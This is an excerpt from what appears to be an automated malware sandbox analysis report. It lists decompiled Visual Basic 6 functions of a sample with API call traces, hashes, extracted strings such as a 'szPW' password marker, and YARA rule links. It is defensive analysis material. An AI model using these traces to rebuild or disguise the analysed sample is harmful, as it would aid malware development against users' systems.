                                                                                    • Opcode Fuzzy Hash: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
                                                                                    • Instruction Fuzzy Hash: F7122D75A01219EBDB14DFA0DE88BDE7BB4FF48304F1081A9E505B72A0DB785A85CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041BDC7 Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 299COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BE27
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BE44
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?), ref: 0041BE64
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BE72
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041BE7E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BE89
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041BE95
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(004055BC,?,?), ref: 0041BEB5
                                                                                    • __vbaStrCat.MSVBVM60(*.dat,?,00000000), ref: 0041BEC5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BED3
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041BEE1
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041BEF3
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(004055BC,?,?), ref: 0041BF0C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BF2B
                                                                                    • __vbaStrFixstr.MSVBVM60(00000104,?), ref: 0041BF58
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BF66
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041BF7A
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 0041BF93
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BFB8
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041BFC4
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 0041BFD9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BFE7
                                                                                    • #578.MSVBVM60(00000000), ref: 0041BFEE
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C00D
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 0041C031
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041C03F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041C056
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C062
                                                                                    • __vbaInStr.MSVBVM60(00000000,["szPW"],?,00000001), ref: 0041C07C
                                                                                    • __vbaInStr.MSVBVM60(00000000,004095E4,?,-00000008), ref: 0041C0B5
                                                                                    • __vbaInStr.MSVBVM60(00000000,004095E4,?,-00000001), ref: 0041C0EE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041C353
                                                                                    • __vbaFreeStr.MSVBVM60(0041C3F0), ref: 0041C3B0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3B9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3C2
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3CB
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3D7
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3E0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3E9
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041C406
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Error$Ansi$BoundsFixstrGenerate$#578CopyDestructListLsetOverflowSystem
                                                                                    • String ID: *.dat$59ABCQEF01$["szPW"]
                                                                                    • API String ID: 806118442-2789598873
                                                                                    • Opcode ID: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
                                                                                    • Instruction ID: e520ffca7d995d5c9d8e1e4b7866a297511e66e05a072c8871b128296ca8dfb1
                                                                                    • Opcode Fuzzy Hash: a5ac6cd11d6c4d803174f6a91ff4b35df35804981069048ccf288ae3b20bb73f
                                                                                    • Instruction Fuzzy Hash: 78D10C71A00258EFDB14DFA0DE88BDEB775EB48301F1081A9E50AB72A0DB745E85CF19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A980 Relevance: 75.5, APIs: 35, Strings: 8, Instructions: 227COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
                                                                                    • #525.MSVBVM60(00000104), ref: 0041AA9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041AAA7
                                                                                    • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041AB1D
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041AB5E
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000), ref: 0041AB6F
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041AB84
                                                                                    • #616.MSVBVM60(00000000,?,?,00000000), ref: 0041AB99
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABA7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041ABBE
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000), ref: 0041ABCA
                                                                                    • #517.MSVBVM60(?,?,00000000), ref: 0041ABDB
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041ABE9
                                                                                    • #517.MSVBVM60(?,00000000,?,00000000), ref: 0041ABF7
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041AC05
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 0041AC0C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041AC30
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041AC77
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041AC8D
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,00000000,Function_000032B6), ref: 0041ACA6
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0041ACCA
                                                                                    • __vbaFreeStr.MSVBVM60(0041AD37), ref: 0041AD03
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041AD1B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041AD24
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041AD30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
                                                                                    • String ID: *.dat$+$00000$59ABCQEF01$["szPW"]$d/m/yy h:m$system\$yymmdd
                                                                                    • API String ID: 3648932012-3366732667
                                                                                    • Opcode ID: 7668726f4cd95b987f5e59ec2b7e3e1321d326a0ceac46527a88094c400bc5a0
                                                                                    • Instruction ID: 2d0d5c7510d645d02d0112559b502ebe2581ea1b8a188934723facc0c59fc7af
                                                                                    • Opcode Fuzzy Hash: 7668726f4cd95b987f5e59ec2b7e3e1321d326a0ceac46527a88094c400bc5a0
                                                                                    • Instruction Fuzzy Hash: 03A11875901219EBDB10DFA0DE48BDEBBB4FB48305F1081A9E50AB72A0DB745A84CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004190D0 Relevance: 73.7, APIs: 30, Strings: 12, Instructions: 179COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004190EE
                                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,Function_000032B6), ref: 0041911B
                                                                                    • __vbaOnError.MSVBVM60(000000FF), ref: 0041912A
                                                                                    • #618.MSVBVM60(?,00000004), ref: 0041913D
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00419148
                                                                                    • #517.MSVBVM60(00000000), ref: 0041914F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041915A
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419163
                                                                                    • __vbaStrCmp.MSVBVM60(.png,?), ref: 00419179
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00419192
                                                                                    • __vbaStrCmp.MSVBVM60(.gif,?), ref: 004191AD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004191C6
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?), ref: 004192FA
                                                                                    • #644.MSVBVM60(?,?,?), ref: 0041932B
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0041934A
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?), ref: 0041936F
                                                                                    • __vbaFreeStr.MSVBVM60(004193A2), ref: 00419389
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00419392
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041939B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFree$CopySystem$Move$#517#618#644Chkstk
                                                                                    • String ID: .bmp$.gif$.jpg$.png$.tif$image/bmp$image/gif$image/jpeg$image/png$image/tiff$jpeg$tiff
                                                                                    • API String ID: 1021285327-184555114
                                                                                    • Opcode ID: ba1cf2ca1d92ba703dd7003ebc9d02931437add039b3899e3393abdce3672aa7
                                                                                    • Instruction ID: 18cdca4dd913881e1e3906aabc5795d02bdbdb37ff3be22054c062f985fa0cbb
                                                                                    • Opcode Fuzzy Hash: ba1cf2ca1d92ba703dd7003ebc9d02931437add039b3899e3393abdce3672aa7
                                                                                    • Instruction Fuzzy Hash: 48710CB1900209EBDB04DFE1DA59BEEBB74FB44304F20806DE502B76A0D7785E45DB18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00426070 Relevance: 64.8, APIs: 43, Instructions: 350COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(660E1A08,00000000,660E6C4A), ref: 004260E5
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004260ED
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 004260F1
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00426110
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00426121
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0042612B
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042613A
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 0042616D
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00426183
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00426199
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004261B0
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 004261C6
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 004261D7
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004261F4
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00426203
                                                                                    • __vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00426224
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0042622A
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 00426239
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0042624E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 00426259
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00426263
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426272
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262D8
                                                                                    • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 004262EB
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 0042630A
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 00426314
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00426331
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00426339
                                                                                    • __vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0042634D
                                                                                    • __vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00426366
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00426372
                                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0042637C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0042639C
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004263AD
                                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 004263D5
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 004263E5
                                                                                    • __vbaExitProc.MSVBVM60 ref: 004263EE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00426410
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00426419
                                                                                    • __vbaFreeStr.MSVBVM60(00426466), ref: 00426443
                                                                                    • __vbaRecDestruct.MSVBVM60(00407F10,?), ref: 0042644E
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042645A
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426463
                                                                                      • Part of subcall function 00426480: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00426152,?), ref: 004264B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
                                                                                    • String ID:
                                                                                    • API String ID: 2812220623-0
                                                                                    • Opcode ID: 4bff154d9429e66b7277ffeb6f82d5934f284739e9e3ccb96d97e83057302d16
                                                                                    • Instruction ID: 6d216b33ba202ac5a5f4cc22896228a38d21b0d4e91878a3c687a56ceed05745
                                                                                    • Opcode Fuzzy Hash: 4bff154d9429e66b7277ffeb6f82d5934f284739e9e3ccb96d97e83057302d16
                                                                                    • Instruction Fuzzy Hash: D7D12A71E00218ABCB04EFE5ED84DEEBBB9BF88704F50411EF505A7254DB74A942CB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420670 Relevance: 61.8, APIs: 41, Instructions: 261COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,00000000), ref: 004206C8
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 004206D0
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 004206D4
                                                                                    • #648.MSVBVM60(0000000A), ref: 004206EC
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004206FB
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 00420714
                                                                                    • __vbaLenBstr.MSVBVM60(00405414), ref: 0042071F
                                                                                    • #525.MSVBVM60(00000000), ref: 00420726
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00420737
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042074B
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00420755
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00420765
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 00420776
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00420779
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00420797
                                                                                    • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004207C6
                                                                                    • __vbaLenBstr.MSVBVM60(00405414), ref: 004207CD
                                                                                    • __vbaGet3.MSVBVM60(00000004,0042C250,00000000), ref: 00420815
                                                                                    • #525.MSVBVM60(00000000), ref: 0042081E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0042082B
                                                                                    • __vbaGet3.MSVBVM60(00000000,0042C254,00000000), ref: 0042083C
                                                                                    • __vbaGet3.MSVBVM60(00000004,0042C1C0,00000000), ref: 0042084C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00420861
                                                                                    • #648.MSVBVM60(0000000A), ref: 00420879
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00420888
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?), ref: 00420899
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004208A4
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 004208B6
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004208BF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004208E1
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 004208EC
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 00420918
                                                                                    • __vbaUI1I2.MSVBVM60 ref: 00420922
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Get3$Copy$#516#631Bstr$#525#648ErrorFileOpen$#537BoundsGenerateList
                                                                                    • String ID:
                                                                                    • API String ID: 695521769-0
                                                                                    • Opcode ID: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
                                                                                    • Instruction ID: 7f18cb6a5bab86a65f3f7d37ad3edf1072490e8e3ae84fdb7564aa9c634781f6
                                                                                    • Opcode Fuzzy Hash: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
                                                                                    • Instruction Fuzzy Hash: ADA1C071E00258DBCB14EFE5ED84ADEBBB5FF48300F50412AE516AB2A1DB745885CF68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00422BF0 Relevance: 61.7, APIs: 41, Instructions: 214COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,00000000,004032B6), ref: 00422C0E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004032B6), ref: 00422C3B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004032B6), ref: 00422C4A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00422C69
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00422C78
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00422C8C
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00422C9A
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422CAA
                                                                                    • #570.MSVBVM60(00000000), ref: 00422CB1
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422CBE
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422CF3
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422CFE
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422D0E
                                                                                    • __vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00422D1B
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422D39
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00422D67
                                                                                    • #525.MSVBVM60(00000000), ref: 00422D6E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422D79
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422D89
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422D94
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00422DA4
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422DB1
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00422DCC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00422DEA
                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 00422DFB
                                                                                    • #616.MSVBVM60(00000000), ref: 00422E02
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00422E0D
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
